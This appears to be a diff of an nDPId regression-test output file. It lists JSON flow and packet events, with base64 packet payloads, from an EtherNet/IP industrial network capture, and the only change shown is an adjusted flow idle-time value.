-00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1352718180263,"flow_last_seen":1352718180263,"flow_idle_time":7440000,"flow_min_l4_payload_len":82,"flow_max_l4_payload_len":82,"flow_tot_l4_payload_len":82,"flow_avg_l4_payload_len":82,"midstream":1,"thread_ts_msec":1352718180263,"l3_proto":"ip4","src_ip":"141.81.0.10","dst_ip":"141.81.0.83","src_port":50275,"dst_port":44818,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00566{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1352718180263,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":136,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":136,"pkt_l4_len":102,"thread_ts_msec":1352718180263,"pkt":"AAC80WDaeOfR4AJeCABFAAB6cCZAAIAGAACNUQAKjVEAU8RjrxLdiI2HlJVDUVAY+XQbbAAAcAA6AAABAhAAAAAAGjkvAAAAAAAAAAAAAAAAAAoAAgChAAQACRM1ALEAJgDkagoCIAIkAQIABgASAEwCIHIkAADOBAABAEwCIHIkACw9BAABAA=="} -00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1352718180263,"flow_last_seen":1352718180263,"flow_idle_time":7440000,"flow_min_l4_payload_len":82,"flow_max_l4_payload_len":82,"flow_tot_l4_payload_len":82,"flow_avg_l4_payload_len":82,"midstream":1,"thread_ts_msec":1352718180263,"l3_proto":"ip4","src_ip":"141.81.0.10","dst_ip":"141.81.0.83","src_port":50275,"dst_port":44818,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"EthernetIP","breed":"Acceptable","category":"Network"}} -00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1352718180264,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1352718180264,"pkt":"eOfR4AJeAAC80WDaCABFAAAowW9AAEAGXmGNUQBTjVEACq8SxGOUlUNR3YiN2VAQD8bOTwAAAAAAAI1R"} -02070{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1352718180264,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1258,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1258,"pkt_l4_len":1224,"thread_ts_msec":1352718180264,"pkt":"AAC80WDaeOfR4AJeCABFAATccChAAIAGAACNUQAKjVEAU8RjrxLdiI3ZlJVDUVAY+XQfzgAAcAAsAAABAhAAAAAAGzkvAAAAAAAAAAAAAAAAAAoAAgChAAQAChU1ALEAGACvuAoCIAIkAQEABABMAiByJAAEggYAAQBwADoAAAECEAAAAAAcOS8AAAAAAAAAAAAAAAAACgACAKEABAAFCzUAsQAmAHuyCgIgAiQBAgAGABIATAIgciQAGLcEAAEATAIgciQAvFQGAAEAcAAsAAABAhAAAAAAHTkvAAAAAAAAAAAAAAAAAAoAAgChAAQABg01ALEAGAAHpAoCIAIkAQEABABMAiByJAAEggYAAQBwAKoAAAECEAAAAAAeOS8AAAAAAAAAAAAAAAAACgACAKEABAABAzUAsQCWABkzCgIgAiQBCgAWACIALgA6AEYAUgBeAGoAdgCCAEwCIHIkAHR\/BwABAEwCIHIkANiMBAABAEwCIHIkAITEBAABAEwCIHIkAAznBQABAEwCIHIkABh0BwABAEwCIHIkADS+BgABAEwCIHIkABDjBAABAEwCIHIkADQ\/BgABAEwCIHIkADS8BQABAEwCIHIkADTGBgABAHAA4gAAAQIQAAAAAB85LwAAAAAAAAAAAAAAAAAKAAIAoQAEAAIFNQCxAM4AoxkKAiACJAEOAB4AKgA2AEIATgBaAGYAcgB+AIoAlgCiAK4AugBMAiByJACUpgQAAQBMAiByJABAoQYAAQBMAiByJADc\/QUAAQBMAiByJAD0hgUABgBMAiByJAAs5QUAAQBMAiByJACYFAcAAQBMAiByJACkkwYAAQBMAiByJABstwQABABMAiByJAA8cgQAAQBMAiByJAC8oAQAAQBMAiByJABQpQUAAQBMAiByJABY4wQAAQBMAiByJAC4xwcAAwBMAiByJAC0zwQAAQBwACwAAAECEAAAAAAgOS8AAAAAAAAAAAAAAAAACgACAKEABAADBzUAsQAYAHenCgIgAiQBAQAEAEwCIHIkAGiiBwAJAHAAwgEAAQIQAAAAACE5LwAAAAAAAAAAAAAAAAAKAAIAoQAEAAQJNQCxAK4Bf58KAiACJAEeAD4ASgBWAGIAbgB6AIYAkgCeAKoAtgDCAM4A2gDmAPIA\/gAKARYBIgEuAToBRgFSAV4BagF2AYIBjgGaAUwCIHIkAIx0BwABAEwCIHIkAKiiBwABAEwCIHIkAJg0BAABAEwCIHIkADgxBwABAEwCIHIkAChvBgABAEwCIHIkACiNBgABAEwCIHIkAAgQBgABAEwCIHIkANRpBwABAEwCIHIkAEB1BgABAEwCIHIkAPQcBgABAEwCIHIkAOwZBgABAEwCIHIkAIizBwABAEwCIHIkAOQgBgABAEwCIHIkAMgaBgABAEwCIHIkAGQ5BwABAEwCIHIkADi\/BgABAEwCIHIkACivBQABAEwCIHIkABwhBgABAEwCIHIkAEj1BQABAEwCIHIkAFT1BgABAEwCIHIkAAA8BgABAEwCIHIkAMRfBwABAEwCIHIkALCqBQABAEwCIHIkAKC1BgABAEwCIHIkAMT8BwABAEwCIHIkAMB0BgABAEwCIHIkAEzoBwABAEwCIHIkAGguBAABAEwCIHIkAHyvBQABAEwCIHIkALwJBgABAA=="} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1352718180265,"flow_last_seen":1352718180265,"flow_idle_time":7440000,"flow_min_l4_payload_len":72,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":72,"midstream":1,"thread_ts_msec":1352718180265,"l3_proto":"ip4","src_ip":"141.81.0.63","dst_ip":"141.81.0.10","src_port":44818,"dst_port":52593,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00550{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1352718180265,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":92,"thread_ts_msec":1352718180265,"pkt":"eOfR4AJeAAC8x85WCABFAABwk1RAAEAGjEiNUQA\/jVEACq8SzXF9dCfmE+ef0VAYEACJaQAAcAAwAAAFAhMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgChAAQAncYAgLEAHAAzNYoAAAACAAYADgDMAAAAAQAAAMwAAAAFAAAA"} -00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1352718180265,"flow_last_seen":1352718180265,"flow_idle_time":7440000,"flow_min_l4_payload_len":72,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":72,"midstream":1,"thread_ts_msec":1352718180265,"l3_proto":"ip4","src_ip":"141.81.0.63","dst_ip":"141.81.0.10","src_port":44818,"dst_port":52593,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"EthernetIP","breed":"Acceptable","category":"Network"}} -00900{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1352718180265,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":386,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":386,"pkt_l4_len":352,"thread_ts_msec":1352718180265,"pkt":"AAC8x85WeOfR4AJeCABFAAF0cCpAAIAGAACNUQAKjVEAP81xrxIT55\/RfXQoLlAY9kIcUgAAcAA6AAAFAhMAAAAAZsC+AAAAAAAAAAAAAAAAAAoAAgChAAQABy8uALEAJgDoRwoCIAIkAQIABgASAEwCIHIkABi3BAABAEwCIHIkADxUBgABAHAA4gAABQITAAAAAGfAvgAAAAAAAAAAAAAAAAAKAAIAoQAEAAMnLgCxAM4AUkkKAiACJAEOAB4AKgA2AEIATgBaAGYAcgB+AIoAlgCiAK4AugBMAiByJACUpgQAAQBMAiByJABEoQYAAQBMAiByJABc\/QUAAQBMAiByJAB0hgUABgBMAiByJACs5AUAAQBMAiByJACcFAcAAQBMAiByJACokwYAAQBMAiByJABstwQABABMAiByJAA8cgQAAQBMAiByJAC8oAQAAQBMAiByJADQpAUAAQBMAiByJABY4wQAAQBMAiByJAC8xwcAAwBMAiByJAC0zwQAAQA="} -00550{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1352718180276,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":92,"thread_ts_msec":1352718180276,"pkt":"eOfR4AJeAAC8x85WCABFAABwk1ZAAEAGjEaNUQA\/jVEACq8SzXF9dCguE+ehHVAYEADbwgAAcAAwAAAFAhMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgChAAQAlcYAgLEAHADoR4oAAAACAAYADgDMAAAAAAAAAMwAAAAFAAAA"} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":33,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1352718180390,"flow_last_seen":1352718180390,"flow_idle_time":7440000,"flow_min_l4_payload_len":194,"flow_max_l4_payload_len":194,"flow_tot_l4_payload_len":194,"flow_avg_l4_payload_len":194,"midstream":1,"thread_ts_msec":1352718180390,"l3_proto":"ip4","src_ip":"141.81.0.10","dst_ip":"141.81.0.43","src_port":52594,"dst_port":44818,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00715{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1352718180390,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":248,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":248,"pkt_l4_len":214,"thread_ts_msec":1352718180390,"pkt":"AAC8X0j6eOfR4AJeCABFAADqcEVAAIAGAACNUQAKjVEAK81yrxIurdArV0tI1VAY+M4btAAAcACqAAAEAhAAAAAAVgG6AAAAAAAAAAAAAAAAAAoAAgChAAQAASuWALEAlgBI5QoCIAIkAQoAFgAiAC4AOgBGAFIAXgBqAHYAggBMAiByJABI8gcAAQBMAiByJAAY8QQAAQBMAiByJABUPgUAAQBMAiByJAB42QcAAQBMAiByJAC8YQYAAQBMAiByJAAgzgQAAQBMAiByJAC8LgUAAQBMAiByJACcBgQAAQBMAiByJACwAQYAAQBMAiByJAD8DwQAAQA="} -00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":33,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1352718180390,"flow_last_seen":1352718180390,"flow_idle_time":7440000,"flow_min_l4_payload_len":194,"flow_max_l4_payload_len":194,"flow_tot_l4_payload_len":194,"flow_avg_l4_payload_len":194,"midstream":1,"thread_ts_msec":1352718180390,"l3_proto":"ip4","src_ip":"141.81.0.10","dst_ip":"141.81.0.43","src_port":52594,"dst_port":44818,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"EthernetIP","breed":"Acceptable","category":"Network"}} -00660{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1352718180392,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1352718180392,"pkt":"eOfR4AJeAAC8X0j6CABFAADAqJJAAEAGds6NUQArjVEACq8SzXJXS0jVLq3Q7VAYEAA2UAAAcACAAAAEAhAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgChAAQApcYAgLEAbABI5YoAAAAKABYAHgAmAC4ANgA+AEYATgBWAF4AzAAAAGC0GD\/MAAAAM1O1QswAAAC1P4xBzAAAAAAAAADMAAAAYLQYP8wAAAAAAKBAzAAAAAAAAEDMAAAAAAAAAMwAAAAAAAAAzAAAAAAAAAA="} -01087{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":35,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1352718180392,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":528,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":528,"pkt_l4_len":494,"thread_ts_msec":1352718180392,"pkt":"AAC8X0j6eOfR4AJeCABFAAICcEdAAIAGAACNUQAKjVEAK81yrxIurdDtV0tJbVAY+DYczAAAcADCAQAEAhAAAAAAVwG6AAAAAAAAAAAAAAAAAAoAAgChAAQAAi2WALEArgFJUwoCIAIkAR4APgBKAFYAYgBuAHoAhgCSAJ4AqgC2AMIAzgDaAOYA8gD+AAoBFgEiAS4BOgFGAVIBXgFqAXYBggGOAZoBTAIgciQALBwHAAEATAIgciQA0BsGAAEATAIgciQAsBQHAAEATAIgciQA3PMHAAEATAIgciQAnDYFAAEATAIgciQAvAcHAAEATAIgciQAkNEFAAEATAIgciQAAH8HAAEATAIgciQATCMGAAEATAIgciQAOEkGAAEATAIgciQALIcEAAEATAIgciQAALQFAAEATAIgciQAqHwFAAEATAIgciQATJYHAAEATAIgciQAaBgHAAEATAIgciQA3PsGAAEATAIgciQATLwGAAEATAIgciQAGB0IAAEATAIgciQAcFMHAAEATAIgciQAvIMFAAEATAIgciQAvBkGAAEATAIgciQAOJQFAAEATAIgciQATLEFAAEATAIgciQA9HoGAAEATAIgciQApPIGAAEATAIgciQAFIEEAAEATAIgciQA2PAEAAEATAIgciQA+FMGAAEATAIgciQA2PUGAAEATAIgciQApF8HAAEA"} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":37,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1352718180397,"flow_last_seen":1352718180397,"flow_idle_time":7440000,"flow_min_l4_payload_len":194,"flow_max_l4_payload_len":194,"flow_tot_l4_payload_len":194,"flow_avg_l4_payload_len":194,"midstream":1,"thread_ts_msec":1352718180397,"l3_proto":"ip4","src_ip":"141.81.0.10","dst_ip":"141.81.0.23","src_port":62717,"dst_port":44818,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00716{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":37,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1352718180397,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":248,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":248,"pkt_l4_len":214,"thread_ts_msec":1352718180397,"pkt":"AAC8X0lReOfR4AJeCABFAADqcEpAAIAGAACNUQAKjVEAF\/T9rxIm2H0TxmFi41AY9W4boAAAcACqAAABAhAAAAAAo6iTAAAAAAAAAAAAAAAAAAoAAgChAAQAAQOLALEAlgBx7AoCIAIkAQQACgAoAEYAagBODJEWTE1TX0RJU0FCTEVfMkRTQ0FOTkVSMQEAAf9ODJEWTE1TX0RJU0FCTEVfMkRTQ0FOTkVSMgEAAf9OD5EbTE1TX0RJU0FCTEVfQkFSQ09ERV9TQ0FOTkVSAAEAAP5OD5EbTE1TX1NFVFBPSU5UQ0hBTkdFX1JFQ0VJVkVEAAEAAP4="} -00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":37,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1352718180397,"flow_last_seen":1352718180397,"flow_idle_time":7440000,"flow_min_l4_payload_len":194,"flow_max_l4_payload_len":194,"flow_tot_l4_payload_len":194,"flow_avg_l4_payload_len":194,"midstream":1,"thread_ts_msec":1352718180397,"l3_proto":"ip4","src_ip":"141.81.0.10","dst_ip":"141.81.0.23","src_port":62717,"dst_port":44818,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"EthernetIP","breed":"Acceptable","category":"Network"}} -00558{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1352718180400,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":130,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":130,"pkt_l4_len":96,"thread_ts_msec":1352718180400,"pkt":"eOfR4AJeAAC8X0lRCABFAAB0TSZAAEAG0pqNUQAXjVEACq8S9P3GYWLjJth91VAYEADGbgAAcAA0AAABAhAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgChAAQAtccAgLEAIABx7IoAAAAEAAoADgASABYAzgAAAM4AAADOAAAAzgAAAA=="} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":52,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1352718180599,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1352718180599,"pkt":"AAC8X0lReOfR4AJeCABFAAAocJ5AAIAGAACNUQAKjVEAF\/T9rxIm2H3VxmFjL1AQ+vAa3gAA"} -00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":100,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":28,"flow_first_seen":1352718180263,"flow_last_seen":1352718180959,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1204,"flow_tot_l4_payload_len":3766,"flow_avg_l4_payload_len":134,"midstream":1,"thread_ts_msec":1352718181050,"l3_proto":"ip4","src_ip":"141.81.0.10","dst_ip":"141.81.0.83","src_port":50275,"dst_port":44818,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EthernetIP","breed":"Acceptable","category":"Network"}} -00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":100,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1352718180397,"flow_last_seen":1352718181046,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":474,"flow_tot_l4_payload_len":2398,"flow_avg_l4_payload_len":109,"midstream":1,"thread_ts_msec":1352718181050,"l3_proto":"ip4","src_ip":"141.81.0.10","dst_ip":"141.81.0.23","src_port":62717,"dst_port":44818,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EthernetIP","breed":"Acceptable","category":"Network"}} -00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":100,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1352718180265,"flow_last_seen":1352718181047,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":474,"flow_tot_l4_payload_len":3114,"flow_avg_l4_payload_len":107,"midstream":1,"thread_ts_msec":1352718181050,"l3_proto":"ip4","src_ip":"141.81.0.63","dst_ip":"141.81.0.10","src_port":44818,"dst_port":52593,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EthernetIP","breed":"Acceptable","category":"Network"}} -00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":100,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1352718180390,"flow_last_seen":1352718181050,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":474,"flow_tot_l4_payload_len":2598,"flow_avg_l4_payload_len":123,"midstream":1,"thread_ts_msec":1352718181050,"l3_proto":"ip4","src_ip":"141.81.0.10","dst_ip":"141.81.0.43","src_port":52594,"dst_port":44818,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EthernetIP","breed":"Acceptable","category":"Network"}} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1352718180263,"flow_last_seen":1352718180263,"flow_idle_time":7560000,"flow_min_l4_payload_len":82,"flow_max_l4_payload_len":82,"flow_tot_l4_payload_len":82,"flow_avg_l4_payload_len":82,"midstream":1,"thread_ts_msec":1352718180263,"l3_proto":"ip4","src_ip":"141.81.0.10","dst_ip":"141.81.0.83","src_port":50275,"dst_port":44818,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00566{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1352718180263,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":136,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":136,"pkt_l4_len":102,"thread_ts_msec":1352718180263,"pkt":"AAC80WDaeOfR4AJeCABFAAB6cCZAAIAGAACNUQAKjVEAU8RjrxLdiI2HlJVDUVAY+XQbbAAAcAA6AAABAhAAAAAAGjkvAAAAAAAAAAAAAAAAAAoAAgChAAQACRM1ALEAJgDkagoCIAIkAQIABgASAEwCIHIkAADOBAABAEwCIHIkACw9BAABAA=="} +00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1352718180263,"flow_last_seen":1352718180263,"flow_idle_time":7560000,"flow_min_l4_payload_len":82,"flow_max_l4_payload_len":82,"flow_tot_l4_payload_len":82,"flow_avg_l4_payload_len":82,"midstream":1,"thread_ts_msec":1352718180263,"l3_proto":"ip4","src_ip":"141.81.0.10","dst_ip":"141.81.0.83","src_port":50275,"dst_port":44818,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"EthernetIP","breed":"Acceptable","category":"Network"}} +00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1352718180264,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1352718180264,"pkt":"eOfR4AJeAAC80WDaCABFAAAowW9AAEAGXmGNUQBTjVEACq8SxGOUlUNR3YiN2VAQD8bOTwAAAAAAAI1R"} +02070{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1352718180264,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1258,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1258,"pkt_l4_len":1224,"thread_ts_msec":1352718180264,"pkt":"AAC80WDaeOfR4AJeCABFAATccChAAIAGAACNUQAKjVEAU8RjrxLdiI3ZlJVDUVAY+XQfzgAAcAAsAAABAhAAAAAAGzkvAAAAAAAAAAAAAAAAAAoAAgChAAQAChU1ALEAGACvuAoCIAIkAQEABABMAiByJAAEggYAAQBwADoAAAECEAAAAAAcOS8AAAAAAAAAAAAAAAAACgACAKEABAAFCzUAsQAmAHuyCgIgAiQBAgAGABIATAIgciQAGLcEAAEATAIgciQAvFQGAAEAcAAsAAABAhAAAAAAHTkvAAAAAAAAAAAAAAAAAAoAAgChAAQABg01ALEAGAAHpAoCIAIkAQEABABMAiByJAAEggYAAQBwAKoAAAECEAAAAAAeOS8AAAAAAAAAAAAAAAAACgACAKEABAABAzUAsQCWABkzCgIgAiQBCgAWACIALgA6AEYAUgBeAGoAdgCCAEwCIHIkAHR\/BwABAEwCIHIkANiMBAABAEwCIHIkAITEBAABAEwCIHIkAAznBQABAEwCIHIkABh0BwABAEwCIHIkADS+BgABAEwCIHIkABDjBAABAEwCIHIkADQ\/BgABAEwCIHIkADS8BQABAEwCIHIkADTGBgABAHAA4gAAAQIQAAAAAB85LwAAAAAAAAAAAAAAAAAKAAIAoQAEAAIFNQCxAM4AoxkKAiACJAEOAB4AKgA2AEIATgBaAGYAcgB+AIoAlgCiAK4AugBMAiByJACUpgQAAQBMAiByJABAoQYAAQBMAiByJADc\/QUAAQBMAiByJAD0hgUABgBMAiByJAAs5QUAAQBMAiByJACYFAcAAQBMAiByJACkkwYAAQBMAiByJABstwQABABMAiByJAA8cgQAAQBMAiByJAC8oAQAAQBMAiByJABQpQUAAQBMAiByJABY4wQAAQBMAiByJAC4xwcAAwBMAiByJAC0zwQAAQBwACwAAAECEAAAAAAgOS8AAAAAAAAAAAAAAAAACgACAKEABAADBzUAsQAYAHenCgIgAiQBAQAEAEwCIHIkAGiiBwAJAHAAwgEAAQIQAAAAACE5LwAAAAAAAAAAAAAAAAAKAAIAoQAEAAQJNQCxAK4Bf58KAiACJAEeAD4ASgBWAGIAbgB6AIYAkgCeAKoAtgDCAM4A2gDmAPIA\/gAKARYBIgEuAToBRgFSAV4BagF2AYIBjgGaAUwCIHIkAIx0BwABAEwCIHIkAKiiBwABAEwCIHIkAJg0BAABAEwCIHIkADgxBwABAEwCIHIkAChvBgABAEwCIHIkACiNBgABAEwCIHIkAAgQBgABAEwCIHIkANRpBwABAEwCIHIkAEB1BgABAEwCIHIkAPQcBgABAEwCIHIkAOwZBgABAEwCIHIkAIizBwABAEwCIHIkAOQgBgABAEwCIHIkAMgaBgABAEwCIHIkAGQ5BwABAEwCIHIkADi\/BgABAEwCIHIkACivBQABAEwCIHIkABwhBgABAEwCIHIkAEj1BQABAEwCIHIkAFT1BgABAEwCIHIkAAA8BgABAEwCIHIkAMRfBwABAEwCIHIkALCqBQABAEwCIHIkAKC1BgABAEwCIHIkAMT8BwABAEwCIHIkAMB0BgABAEwCIHIkAEzoBwABAEwCIHIkAGguBAABAEwCIHIkAHyvBQABAEwCIHIkALwJBgABAA=="} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1352718180265,"flow_last_seen":1352718180265,"flow_idle_time":7560000,"flow_min_l4_payload_len":72,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":72,"midstream":1,"thread_ts_msec":1352718180265,"l3_proto":"ip4","src_ip":"141.81.0.63","dst_ip":"141.81.0.10","src_port":44818,"dst_port":52593,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00550{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1352718180265,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":92,"thread_ts_msec":1352718180265,"pkt":"eOfR4AJeAAC8x85WCABFAABwk1RAAEAGjEiNUQA\/jVEACq8SzXF9dCfmE+ef0VAYEACJaQAAcAAwAAAFAhMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgChAAQAncYAgLEAHAAzNYoAAAACAAYADgDMAAAAAQAAAMwAAAAFAAAA"} 